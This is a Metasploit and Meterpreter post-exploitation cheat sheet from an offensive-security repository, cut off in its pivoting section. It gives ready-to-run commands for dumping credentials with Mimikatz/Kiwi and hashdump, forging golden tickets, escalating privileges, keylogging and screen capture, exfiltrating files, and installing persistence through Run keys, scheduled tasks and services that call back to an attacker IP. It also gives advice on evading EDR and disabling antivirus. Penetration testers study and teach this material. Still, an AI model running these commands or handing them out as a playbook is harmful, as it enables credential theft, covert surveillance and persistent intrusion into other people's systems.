daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

metasploit.md (48569B)


      1 ---
      2 title: "Metasploit Framework"
      3 description: "msfconsole and Meterpreter workflow: search, exploits, payloads, sessions, post modules, pivoting."
      4 category: exploitation
      5 tags: [exploitation, framework, post-exploitation]
      6 tools: [Metasploit, msfconsole, Meterpreter]
      7 difficulty: intermediate
      8 updated: "2026-08-09"
      9 source: "vault:Tools/meterpreter.md"
     10 ---
     11 
     12 # Metasploit Framework
     13 
     14 ---
     15 
     16 ## Session Management
     17 
     18 > **Note —** + Prerequisites
     19 > 1. Successful exploit execution or payload delivery
     20 > 2. Network connectivity to handler
     21 > 3. Appropriate listener configured in [Metasploit Framework](https://www.metasploit.com/)
     22 
     23 > **Note —** + [Metasploit Framework](https://www.metasploit.com/) Overview
     24 > Open-source penetration testing platform for exploit development and execution
     25 > 4. Exploit database with thousands of modules
     26 > 5. Payload generation and delivery mechanisms
     27 > 6. Post-exploitation framework via [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/)
     28 > 7. Session management and pivoting capabilities
     29 
     30 ### Core Session Commands
     31 
     32 ```bash
     33 # In msfconsole
     34 sessions -l                    # List all active sessions
     35 sessions -i <ID>              # Interact with session
     36 sessions -k <ID>              # Kill session
     37 sessions -K                   # Kill all sessions
     38 sessions -u <ID>              # Upgrade shell to Meterpreter (if applicable)
     39 background                    # Background current session (Ctrl+Z)
     40 ```
     41 
     42 > **Note —** + Command Breakdown
     43 > 1. **sessions -l**: Displays all active sessions with details (ID, type, target, timestamp)
     44 > 2. **-i <ID>**: Interact with specific session number to access [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) prompt
     45 > 3. **-v**: Verbose session information including architecture and user context
     46 > 4. **-q**: Quiet mode with minimal output for scripting
     47 > 5. **-u <ID>**: Upgrades standard shell to full [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session (if architecture matches)
     48 > 6. *Check "Last checkin" timestamp to verify session health and connectivity*
     49 
     50 > **Note —** + Session Management Best Practices
     51 > 1. Always verify session type and architecture before operations
     52 > 2. Background sessions instead of closing to preserve access
     53 > 3. Monitor session check-in times for connectivity issues
     54 > 4. Upgrade shells to [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) for enhanced capabilities
     55 > 5. Name sessions with `-n` flag for easy identification in multi-target engagements
     56 
     57 ### Output Interpretation
     58 
     59 | Column | Description | Notes |
     60 |:---|:---|:---|
     61 | Session ID | Unique identifier for each connection | Used for all session commands |
     62 | Type | [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) (staged/stageless), shell, etc. | Determines available commands |
     63 | Info | Target OS, architecture, user context | Critical for payload compatibility |
     64 | Last checkin | Timestamp of last communication | Health indicator for session |
     65 
     66 > **Note —** + OPSEC and Detection Considerations
     67 > 1. [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) runs in memory (fileless) but creates network traffic patterns
     68 > 2. Reverse TCP connections generate outbound traffic—firewall/EDR may alert
     69 > 3. Session check-ins create periodic beaconing (default 5 sec)—tune with `set SessionCommunicationTimeout`
     70 > 4. Process injection and migration leave forensic traces in memory
     71 > 5. Network traffic patterns are signatured by modern EDR solutions
     72 
     73 > **Note —** + Common Errors and Solutions
     74 > 6. **"Session X is not valid"**: Session died; check network stability and target system status
     75 > 7. **"Exploit completed, but no session was created"**: Payload blocked by AV/EDR or architecture mismatch
     76 > 8. **Timeout errors**: Adjust `SessionExpirationTimeout` and `SessionCommunicationTimeout` in handler options
     77 > 9. **Connection drops**: Firewall blocking callbacks or target system rebooted
     78 
     79 ---
     80 
     81 ## Navigation and System Information
     82 
     83 > **Note —** + Prerequisites
     84 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session
     85 > 2. User-level access minimum
     86 > 3. Understanding of target operating system file structure
     87 
     88 ### Core Navigation Commands
     89 
     90 ```bash
     91 sysinfo                       # System information (OS, arch, hostname)
     92 getuid                        # Current user context
     93 pwd                           # Print working directory
     94 ls                            # List directory contents
     95 cd <path>                     # Change directory
     96 cat <file>                    # Display file contents
     97 download <remote> <local>     # Download file from target
     98 upload <local> <remote>       # Upload file to target
     99 search -f <pattern>           # Search for files
    100 ps                            # List processes
    101 shell                         # Drop to system shell
    102 exit                          # Close Meterpreter session
    103 ```
    104 
    105 > **Note —** + Command Breakdown
    106 > 1. **sysinfo**: Returns OS version, architecture (x86/x64), hostname, and domain membership
    107 > 2. **getuid**: Shows current user privilege level (SYSTEM, administrator, standard user)
    108 > 3. **ls -l**: Long format displaying permissions, timestamps, and file sizes
    109 > 4. **download -r <dir>**: Recursive download of entire directory structure
    110 > 5. **search -d <dir> -f <pattern>**: Search specific directory for filename patterns
    111 > 6. **ps -S <name>**: Filter process list by name for quick identification
    112 > 7. *File operations generate disk I/O that may trigger EDR monitoring*
    113 
    114 ### File Search and Enumeration
    115 
    116 ```bash
    117 # Navigate and exfiltrate
    118 cd C:\\Users\\victim\\Documents
    119 ls
    120 download sensitive.docx /tmp/loot/
    121 
    122 # Upload tool
    123 upload /opt/tools/mimikatz.exe C:\\Windows\\Temp\\m.exe
    124 
    125 # Find files
    126 search -f *.kdbx
    127 search -d C:\\Users -f *password*
    128 
    129 # Process enumeration
    130 ps
    131 ps -S lsass.exe
    132 ```
    133 
    134 > **Note —** + Search Command Breakdown
    135 > 1. **search -f *.kdbx**: Locate [KeePass](https://keepass.info/) database files containing credentials
    136 > 2. **-d C:\\Users**: Limits search scope to specific directory for faster results
    137 > 3. **\*password\***: Wildcard pattern matching for files containing "password" in filename
    138 > 4. *Search operations generate high disk I/O and may be detected by behavioral analysis*
    139 
    140 ### Process Enumeration Analysis
    141 
    142 > **Note —** + Process List Interpretation
    143 > 1. Look for security products (Windows Defender, CrowdStrike, Carbon Black)
    144 > 2. Identify high-value processes ([lsass.exe](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) for credentials, browsers for sessions)
    145 > 3. Note process architecture (x86/x64) for migration compatibility
    146 > 4. Check process ownership to identify privilege levels
    147 
    148 > **Note —** + OPSEC and Detection Considerations
    149 > 1. File operations (`download`, `upload`, `cat`) generate disk I/O—EDR may flag
    150 > 2. `shell` drops to cmd.exe/bash—creates child process and logs ([Windows Event 4688](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4688))
    151 > 3. Excessive `ls` or `search` commands indicate enumeration behavior pattern
    152 > 4. Timestomping not automatic—use `timestomp` separately if needed for stealth
    153 > 5. File access generates [Windows Event 4663](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4663) (object access)
    154 
    155 > **Note —** + Common Errors and Solutions
    156 > 6. **"Operation failed: Access is denied"**: Insufficient privileges or file in use by system
    157 > 7. **"Download failed"**: Verify target file path, permissions, and disk space on attacker system
    158 > 8. **shell hangs**: Adjust `read` timeout or use `execute -f cmd.exe -i -c` for interactive shell
    159 > 9. **Path errors on Windows**: Use double-backslashes or forward slashes in paths
    160 
    161 ---
    162 
    163 ## Credential Extraction with Kiwi (Mimikatz)
    164 
    165 > **Note —** + High Detection Risk Warning
    166 > [Kiwi](https://github.com/gentilkiwi/mimikatz)/[Mimikatz](https://github.com/gentilkiwi/mimikatz) is heavily signatured by AV/EDR. Opening lsass.exe triggers alerts on mature EDR platforms (Defender ATP, CrowdStrike, SentinelOne). Consider alternatives: procdump → parse offline, or native comsvcs.dll method.
    167 
    168 > **Note —** + Prerequisites
    169 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session on Windows target
    170 > 2. SYSTEM or Administrator privileges (for most functions)
    171 > 3. Target process with credentials in memory ([lsass.exe](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection))
    172 > 4. Kiwi module available in [Metasploit](https://www.metasploit.com/)
    173 
    174 > **Note —** + [Mimikatz](https://github.com/gentilkiwi/mimikatz) Overview
    175 > Post-exploitation tool for extracting plaintext passwords, hashes, and Kerberos tickets from Windows memory
    176 > 1. Dumps credentials from [LSASS](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) (Local Security Authority Subsystem Service)
    177 > 2. Extracts [Kerberos](https://web.mit.edu/kerberos/) tickets for Pass-the-Ticket attacks
    178 > 3. Creates [Golden Tickets](https://attack.mitre.org/techniques/T1558/001/) for domain persistence
    179 > 4. Bypasses authentication mechanisms in Windows environments
    180 
    181 ### Core Kiwi Commands
    182 
    183 ```bash
    184 load kiwi                     # Load Kiwi extension
    185 kiwi_cmd                      # Execute raw Mimikatz command
    186 creds_all                     # Dump all credentials (msv, kerberos, wdigest, etc.)
    187 creds_msv                     # Dump NTLM hashes (MSV)
    188 creds_kerberos                # Dump Kerberos tickets
    189 creds_wdigest                 # Dump WDigest credentials (plaintext if enabled)
    190 creds_ssp                     # Dump SSP credentials
    191 creds_tspkg                   # Dump TsPkg credentials
    192 lsa_dump_sam                  # Dump local SAM hashes
    193 lsa_dump_secrets              # Dump LSA secrets
    194 golden_ticket_create          # Create Kerberos Golden Ticket
    195 ```
    196 
    197 > **Note —** + Command Breakdown
    198 > 1. **load kiwi**: Loads [Mimikatz](https://github.com/gentilkiwi/mimikatz) extension into [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session (architecture must match)
    199 > 2. **creds_all**: Attempts all credential extraction methods simultaneously
    200 > 3. **creds_msv**: Extracts NTLM hashes from MSV1_0 authentication package
    201 > 4. **creds_wdigest**: Extracts plaintext passwords (Windows 7/2008R2 only, disabled by default on 10+)
    202 > 5. **lsa_dump_sam**: Dumps local SAM database hashes (equivalent to `hashdump`)
    203 > 6. *Commands auto-execute in SYSTEM context if migrated to appropriate process*
    204 
    205 ### Practical Credential Extraction
    206 
    207 ```bash
    208 # Load Kiwi module
    209 load kiwi
    210 
    211 # Dump all credential types
    212 creds_all
    213 
    214 # Dump only NTLM hashes
    215 creds_msv
    216 
    217 # Dump Kerberos tickets
    218 creds_kerberos
    219 
    220 # Dump local SAM database
    221 lsa_dump_sam
    222 
    223 # Execute custom Mimikatz command
    224 kiwi_cmd "sekurlsa::logonpasswords"
    225 
    226 # Create Golden Ticket (requires krbtgt hash)
    227 golden_ticket_create -d domain.local -u Administrator -s <SID> -k <NTLM_hash>
    228 ```
    229 
    230 > **Note —** + Output Interpretation
    231 > 1. **Authentication Id**: Correlates credentials to specific logon sessions
    232 > 2. **User Name**: Account associated with credentials
    233 > 3. **NTLM hashes**: Use for [Pass-the-Hash](https://attack.mitre.org/techniques/T1550/002/) attacks
    234 > 4. **Kerberos tickets**: Extract .kirbi files for [Pass-the-Ticket](https://attack.mitre.org/techniques/T1550/003/) or Overpass-the-Hash
    235 > 5. **WDigest**: Plaintext passwords (only on Windows 7/2008R2 or if manually enabled)
    236 
    237 ### Credential Attack Techniques
    238 
    239 | Credential Type | Attack Method | Use Case |
    240 |:---|:---|:---|
    241 | NTLM Hash | [Pass-the-Hash](https://attack.mitre.org/techniques/T1550/002/) | Lateral movement without plaintext password |
    242 | Kerberos Ticket | [Pass-the-Ticket](https://attack.mitre.org/techniques/T1550/003/) | Impersonate user sessions |
    243 | WDigest Plaintext | Direct authentication | Access services requiring password |
    244 | krbtgt Hash | [Golden Ticket](https://attack.mitre.org/techniques/T1558/001/) | Domain-level persistence |
    245 
    246 > **Note —** + OPSEC and Detection Considerations
    247 > 1. **HIGH DETECTION RISK**: [Kiwi](https://github.com/gentilkiwi/mimikatz)/[Mimikatz](https://github.com/gentilkiwi/mimikatz) heavily signatured by AV/EDR
    248 > 2. Opening [lsass.exe](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) triggers alerts on mature EDR (Defender ATP, CrowdStrike, SentinelOne)
    249 > 3. [Windows Event 4656](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (handle to lsass.exe) + [4663](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4663) (lsass.exe read) = common detection
    250 > 4. [Credential Guard](https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard) (Windows 10+) blocks many [Mimikatz](https://github.com/gentilkiwi/mimikatz) techniques
    251 > 5. Memory scanning will detect [Mimikatz](https://github.com/gentilkiwi/mimikatz) strings/patterns
    252 > 6. Consider alternatives: [procdump](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump) → parse offline, or native comsvcs.dll method
    253 
    254 > **Note —** + Common Errors and Solutions
    255 > 1. **"Load Mimikatz failed"**: Anti-virus blocked; migrate to different process or disable AV
    256 > 2. **"Access is denied" / "ERROR kuhl_m_sekurlsa"**: Not running as SYSTEM—use `getsystem` first
    257 > 3. **"No credentials found"**: WDigest disabled (Windows 10+); rely on NTLM hashes instead
    258 > 4. **Kiwi module not available**: Update [Metasploit](https://www.metasploit.com/) or use standalone [Mimikatz](https://github.com/gentilkiwi/mimikatz)
    259 > 5. **Architecture mismatch**: Ensure [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session matches target (x64 for x64 Windows)
    260 
    261 > **Note —** + Alternative Credential Extraction Methods
    262 > 6. **procdump + offline parsing**: Less noisy, avoids real-time EDR hooks
    263 > 7. **comsvcs.dll method**: Native Windows DLL for LSASS dumping
    264 > 8. **Task Manager dump**: Manual method, less suspicious than automated tools
    265 > 9. **SSP/AP registration**: Custom Security Support Provider for credential interception
    266 > 10. **Registry hive extraction**: Export SAM/SYSTEM hives for offline cracking
    267 
    268 ---
    269 
    270 ## Privilege Escalation
    271 
    272 > **Note —** + Prerequisites
    273 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session
    274 > 2. User-level access minimum
    275 > 3. Exploitable privilege escalation vector (misconfiguration, unpatched vulnerability)
    276 > 4. Understanding of target Windows version and patch level
    277 
    278 ### Core Privilege Escalation Commands
    279 
    280 ```bash
    281 getsystem                     # Attempt automatic privilege escalation
    282 getprivs                      # Display current process privileges
    283 use post/multi/recon/local_exploit_suggester   # Suggest priv-esc exploits
    284 use exploit/windows/local/*   # Local exploit modules
    285 run post/windows/gather/win_privs   # Enumerate Windows privileges
    286 ```
    287 
    288 > **Note —** + Command Breakdown
    289 > 1. **getsystem**: Tries multiple techniques (named pipe impersonation, token duplication)
    290 > 2. **-t flag**: Specify technique: `getsystem -t 1` (technique 1: named pipe impersonation)
    291 > 3. **getprivs**: Lists current process [privileges](https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants) (SeDebugPrivilege, SeImpersonatePrivilege critical)
    292 > 4. **local_exploit_suggester**: Compares installed patches against known privilege escalation exploits
    293 > 5. *Always run `getuid` and `getprivs` before attempting escalation*
    294 
    295 ### Privilege Escalation Workflow
    296 
    297 ```bash
    298 # Check current privileges
    299 getuid
    300 getprivs
    301 
    302 # Attempt automatic escalation
    303 getsystem
    304 
    305 # If getsystem fails, background and run suggester
    306 background
    307 use post/multi/recon/local_exploit_suggester
    308 set SESSION 1
    309 run
    310 
    311 # Run suggested exploit
    312 use exploit/windows/local/ms16_075_reflection
    313 set SESSION 1
    314 set LHOST <your_IP>
    315 run
    316 
    317 # Verify escalation
    318 getuid   # Should show "NT AUTHORITY\SYSTEM"
    319 ```
    320 
    321 > **Note —** + Privilege Escalation Technique Analysis
    322 > 1. **Technique 0 (Named Pipe Impersonation)**: Creates named pipe, impersonates SYSTEM token
    323 > 2. **Technique 1 (Token Duplication)**: Duplicates existing SYSTEM token from service process
    324 > 3. **Technique 2 (Named Pipe Impersonation - Alternative)**: Variation of technique 0
    325 > 4. *Modern Windows (10+) has protections against named pipe impersonation attacks*
    326 
    327 ### Important Windows Privileges
    328 
    329 | Privilege | Attack Method | Description |
    330 |:---|:---|:---|
    331 | SeDebugPrivilege | Process injection | Debug and inject into any process |
    332 | SeImpersonatePrivilege | [Potato attacks](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) | Impersonate tokens (RoguePotato, PrintSpoofer) |
    333 | SeBackupPrivilege | File access | Read any file on system |
    334 | SeRestorePrivilege | File modification | Write to any file on system |
    335 | SeLoadDriverPrivilege | Kernel exploit | Load unsigned drivers |
    336 
    337 > **Note —** + OPSEC and Detection Considerations
    338 > 1. `getsystem` creates named pipes—EDR may detect pattern (e.g., `\\\\.\\pipe\\random`)
    339 > 2. Token manipulation = suspicious API calls (OpenProcess, DuplicateTokenEx)
    340 > 3. Local exploits may crash processes or generate kernel logs
    341 > 4. Prefer misconfigurations (unquoted service paths, weak permissions) over exploits when possible
    342 > 5. [Windows Event 4673](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673) logs sensitive privilege use
    343 
    344 > **Note —** + Common Errors and Solutions
    345 > 6. **"Operation failed: Access is denied"**: Technique blocked by OS or AV; try alternative method
    346 > 7. **"Could not obtain SYSTEM"**: No exploitable path; enumerate manually or use external tool
    347 > 8. **Exploit crashes session**: Unstable target or wrong OS version—check `sysinfo` first
    348 > 9. **Suggester returns no results**: System fully patched; focus on misconfigurations
    349 
    350 > **Note —** + Alternative Privilege Escalation Vectors
    351 > 10. **Unquoted Service Paths**: Service paths with spaces and no quotes
    352 > 11. **Weak Service Permissions**: Services modifiable by low-privilege users
    353 > 12. **Always Install Elevated**: Registry setting allowing MSI installation as SYSTEM
    354 > 13. **Scheduled Tasks**: Tasks running as SYSTEM with writable binaries
    355 > 14. **DLL Hijacking**: Missing DLLs in service search paths
    356 
    357 ---
    358 
    359 ## Local Hash Extraction (Non-Kiwi)
    360 
    361 > **Note —** + Prerequisites
    362 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session on Windows
    363 > 2. SYSTEM or Administrator privileges
    364 > 3. Access to [SAM](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-processes-in-windows-authentication)/SYSTEM registry hives
    365 
    366 ### Core Hash Extraction Commands
    367 
    368 ```bash
    369 hashdump                      # Dump local SAM password hashes
    370 run post/windows/gather/credentials/credential_collector   # Collect multiple credential sources
    371 run post/windows/gather/smart_hashdump   # Dump hashes from SAM & domain cache
    372 ```
    373 
    374 > **Note —** + Command Breakdown
    375 > 1. **hashdump**: Classic command requiring SYSTEM privileges for registry access
    376 > 2. **credential_collector**: Comprehensive module collecting from multiple sources (SAM, LSA, registry)
    377 > 3. **smart_hashdump**: Enhanced version with domain cache support and better error handling
    378 > 4. *Always escalate to SYSTEM with `getsystem` before hash extraction*
    379 
    380 ### Hash Extraction Workflow
    381 
    382 ```bash
    383 # Escalate to SYSTEM
    384 getsystem
    385 
    386 # Dump local hashes
    387 hashdump
    388 
    389 # Alternative: Run smart_hashdump module
    390 background
    391 use post/windows/gather/smart_hashdump
    392 set SESSION 1
    393 run
    394 
    395 # Collect all available credentials
    396 use post/windows/gather/credentials/credential_collector
    397 set SESSION 1
    398 run
    399 ```
    400 
    401 > **Note —** + Hash Format Output Interpretation
    402 > **Format**: `username:RID:LM_hash:NTLM_hash:::`
    403 > 1. **LM hash**: Often `aad3b435b51404eeaad3b435b51404ee` (empty/disabled on modern Windows)
    404 > 2. **NTLM hash**: Modern hash format for [Pass-the-Hash](https://attack.mitre.org/techniques/T1550/002/) attacks or offline cracking
    405 > 3. **RID 500**: Built-in Administrator account (high-value target)
    406 > 4. **RID 501**: Built-in Guest account (usually disabled)
    407 
    408 ### Hash Attack Techniques
    409 
    410 | Hash Type | Tool | Command Example |
    411 |:---|:---|:---|
    412 | NTLM | [hashcat](https://hashcat.net/hashcat/) | `hashcat -m 1000 hashes.txt rockyou.txt` |
    413 | NTLM | [John the Ripper](https://www.openwall.com/john/) | `john --format=NT hashes.txt` |
    414 | LM | [hashcat](https://hashcat.net/hashcat/) | `hashcat -m 3000 hashes.txt rockyou.txt` |
    415 | Pass-the-Hash | [Impacket](https://github.com/SecureAuthCorp/impacket) | `psexec.py -hashes :NTLM admin@target` |
    416 
    417 > **Note —** + OPSEC and Detection Considerations
    418 > 1. Reading [SAM](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-processes-in-windows-authentication) registry hive is detectable (registry access events)
    419 > 2. Less noisy than [Kiwi](https://github.com/gentilkiwi/mimikatz)/[Mimikatz](https://github.com/gentilkiwi/mimikatz) but still generates logs
    420 > 3. Consider exfiltrating registry hives manually (`reg save HKLM\\SAM`, `reg save HKLM\\SYSTEM`) for offline extraction
    421 > 4. File `%SystemRoot%\\System32\\config\\SAM` locked while OS running—use registry hive method
    422 > 5. [Windows Event 4657](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4657) logs registry value modifications
    423 
    424 > **Note —** + Common Errors and Solutions
    425 > 6. **"Access is denied"**: Not SYSTEM—run `getsystem` first before hash extraction
    426 > 7. **"Failed to dump hashes"**: SAM database locked or corrupted; try `smart_hashdump` or registry export
    427 > 8. **Empty hash output**: Target is domain-joined with no local accounts used
    428 > 9. **Module fails**: Try classic `hashdump` command instead of post modules
    429 
    430 > **Note —** + Offline Hash Extraction Alternative
    431 > 10. Export registry hives: `reg save HKLM\\SAM sam.hive` and `reg save HKLM\\SYSTEM system.hive`
    432 > 11. Download hives from target system
    433 > 12. Extract locally using [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) from [Impacket](https://github.com/SecureAuthCorp/impacket)
    434 > 13. Less detection risk (no LSASS interaction, standard registry operations)
    435 
    436 ---
    437 
    438 ## Screenshot and Keylogging
    439 
    440 > **Note —** + Prerequisites
    441 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session
    442 > 2. User-level access (screenshots require active GUI session)
    443 > 3. Keylogger requires injection into user process (explorer.exe, browser)
    444 > 4. Active desktop session (RDP, physical console, or virtual desktop)
    445 
    446 ### Core Surveillance Commands
    447 
    448 ```bash
    449 screenshot                    # Capture single screenshot
    450 screenshare                   # Stream live screenshots
    451 keyscan_start                 # Start keylogger
    452 keyscan_dump                  # Dump captured keystrokes
    453 keyscan_stop                  # Stop keylogger
    454 ```
    455 
    456 > **Note —** + Command Breakdown
    457 > 1. **screenshot -v false**: Disable automatic view/display of captured screenshot
    458 > 2. **screenshot -p <path>**: Save screenshot to specific file path
    459 > 3. **screenshare -q <quality>**: Set JPEG quality (1-100) for bandwidth optimization
    460 > 4. **keyscan_start**: Hooks keyboard input at OS level
    461 > 5. *Migrate to explorer.exe or browser process before starting keylogger for stability*
    462 
    463 ### Surveillance Workflow
    464 
    465 ```bash
    466 # Capture screenshot
    467 screenshot
    468 
    469 # Save screenshot to specific file
    470 screenshot -p /tmp/loot/desktop.png
    471 
    472 # Stream screenshots (real-time)
    473 screenshare
    474 
    475 # Start keylogger
    476 keyscan_start
    477 
    478 # Wait, then dump keystrokes
    479 keyscan_dump
    480 
    481 # Stop keylogger
    482 keyscan_stop
    483 ```
    484 
    485 > **Note —** + Output Interpretation
    486 > 1. **Screenshot**: Saved to local attacker system; check for sensitive data on screen (passwords, documents)
    487 > 2. **Keystroke dump**: Plain text; look for passwords typed in forms or applications
    488 > 3. **Parse keylogs**: Search for credentials (login forms, password managers, terminal commands)
    489 > 4. **Timestamp analysis**: Correlate keystrokes with user activity patterns
    490 
    491 > **Note —** + OPSEC and Detection Considerations
    492 > 1. `screenshot` uses Windows GDI API—low detection but generates memory artifacts
    493 > 2. `screenshare` creates persistent network traffic (bandwidth spike)—may alert network operations
    494 > 3. Keylogger hooks keyboard input—EDR detects SetWindowsHookEx, GetAsyncKeyState APIs
    495 > 4. Migrate to explorer.exe or browser for keylogger stability and stealth
    496 > 5. AV signatures exist for [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) keylogger patterns
    497 > 6. Memory forensics can detect injected keylogger code
    498 
    499 > **Note —** + Common Errors and Solutions
    500 > 1. **"No active desktop session"**: RDP/GUI not active; screenshots fail on Server Core or no logged-in user
    501 > 2. **"Could not start keylogger"**: Injection failed—try migrating to different process (explorer.exe)
    502 > 3. **Screenshot blank/black**: Target using Citrix/RDP session with restricted display capture
    503 > 4. **Keylogger crashes**: Process terminated or protected by security software
    504 
    505 > **Note —** + Keylogger Best Practices
    506 > 1. Migrate to stable, long-running process (explorer.exe) before starting
    507 > 2. Dump keystrokes periodically to avoid losing data if session dies
    508 > 3. Parse output for credential patterns (username/password forms)
    509 > 4. Consider process-specific keylogging for targeted data collection
    510 > 5. Stop keylogger when not actively collecting to reduce detection risk
    511 
    512 ---
    513 
    514 ## Persistence Mechanisms
    515 
    516 > **Note —** + High Detection Risk Warning
    517 > Persistence mechanisms leave indicators of compromise (IOCs) on disk and in registry. These are heavily monitored by EDR and will generate alerts. Always document IOCs for post-engagement remediation.
    518 
    519 > **Note —** + Prerequisites
    520 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session
    521 > 2. Administrator or SYSTEM privileges (for system-wide persistence)
    522 > 3. Write access to startup folders, registry, or scheduled tasks
    523 > 4. Understanding of target security monitoring capabilities
    524 
    525 ### Core Persistence Commands
    526 
    527 ```bash
    528 run persistence -h            # Show persistence options (deprecated; use module)
    529 run exploit/windows/local/persistence_service   # Install as Windows service
    530 ```
    531 
    532 > **Note —** + Persistence Options (Legacy)
    533 > 1. **-U**: User-level persistence (HKCU startup)—survives only for specific user
    534 > 2. **-X**: System-level persistence (HKLM startup, requires admin)—survives all users
    535 > 3. **-i <seconds>**: Callback interval between beacon connections
    536 > 4. **-r <IP>**: Reverse connection IP address for callback
    537 > 5. *Legacy `run persistence` script deprecated in Metasploit 6.x—use post modules instead*
    538 
    539 ### Modern Persistence Implementation
    540 
    541 ```bash
    542 # Legacy persistence (if available)
    543 run persistence -U -i 60 -p 443 -r <your_IP>
    544 
    545 # Modern method: Use post module
    546 background
    547 use exploit/windows/local/persistence_service
    548 set SESSION 1
    549 set LHOST <your_IP>
    550 set LPORT 443
    551 run
    552 
    553 # Alternative: Manual registry key
    554 execute -f reg -a "add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Windows\\Temp\\payload.exe"
    555 
    556 # Scheduled task persistence
    557 execute -f schtasks -a "/create /tn \"Updater\" /tr C:\\Windows\\Temp\\payload.exe /sc onlogon /ru System"
    558 ```
    559 
    560 > **Note —** + Persistence Technique Breakdown
    561 > 1. **Registry Run keys**: Executes on user logon (HKCU) or system boot (HKLM)
    562 > 2. **Windows Service**: Runs as service with SYSTEM privileges
    563 > 3. **Scheduled Task**: Flexible triggers (logon, boot, time-based)
    564 > 4. **WMI Event Subscription**: Stealthy, survives reboots, difficult to detect
    565 > 5. *Always save cleanup script path from module output for IOC removal*
    566 
    567 ### Persistence Technique Comparison
    568 
    569 | Technique | Privilege Required | Stealth | Detection Method |
    570 |:---|:---|:---|:---|
    571 | Registry Run Key | User | Low | [Event 4657](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4657), Registry monitoring |
    572 | Windows Service | Administrator | Low | [Event 7045](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-7045), Service enumeration |
    573 | Scheduled Task | Administrator | Medium | [Event 4698](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698), Task enumeration |
    574 | WMI Event | Administrator | High | WMI repository inspection |
    575 | DLL Hijacking | User/Admin | High | Process monitoring, DLL auditing |
    576 
    577 > **Note —** + OPSEC and Detection Considerations
    578 > 1. **HIGH DETECTION RISK**: Persistence = IOC left on disk/registry
    579 > 2. Registry Run keys (HKCU/HKLM `\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`) heavily monitored
    580 > 3. Scheduled tasks generate [Event 4698](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698) (Windows Security Log)—blue teams watch this
    581 > 4. Service creation = [Event 7045](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-7045) (System Log)—immediate alert trigger
    582 > 5. Payload on disk = AV/EDR will scan and likely detect
    583 > 6. Consider WMI, WMI Event Subscriptions, or DLL hijacking for stealthier persistence
    584 > 7. Always have cleanup plan and document IOCs for post-test remediation
    585 
    586 > **Note —** + Common Errors and Solutions
    587 > 8. **"Insufficient privileges"**: Requires admin for HKLM/service persistence; try user-level `-U`
    588 > 9. **"Could not write payload"**: AV deleted file or path doesn't exist—check permissions
    589 > 10. **Session not re-connecting**: Firewall blocked outbound, wrong IP/port, or payload detected
    590 > 11. **Module fails**: Deprecated script; update [Metasploit](https://www.metasploit.com/) or use alternative module
    591 
    592 > **Note —** + Stealthier Persistence Alternatives
    593 > 12. **WMI Event Subscriptions**: Harder to detect, survives reboots
    594 > 13. **DLL Hijacking**: Legitimate process loads malicious DLL
    595 > 14. **COM Hijacking**: Redirects COM object instantiation
    596 > 15. **Accessibility Features**: Replace sethc.exe, utilman.exe (requires SYSTEM)
    597 > 16. **AppInit_DLLs**: Injects DLL into all processes (Windows 7 only)
    598 
    599 ---
    600 
    601 ## Pivoting and Port Forwarding
    602 
    603 > **Note —** + Prerequisites
    604 > 1. Active [Meterpreter](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) session
    605 > 2. Target host multi-homed (connected to multiple networks)
    606 > 3. Understanding of target network topology and segmentation
    607 > 4. [proxychains](https://github.com/haad/proxychains) or similar tool for SOCKS proxying
    608 
    609 > **Note —** + [proxychains](https://github.com/haad/proxychains) Overview
    610 > Tool for forcing network traffic through SOCKS or HTTP proxies
    611 > 1. Tunnels application traffic through proxy chains
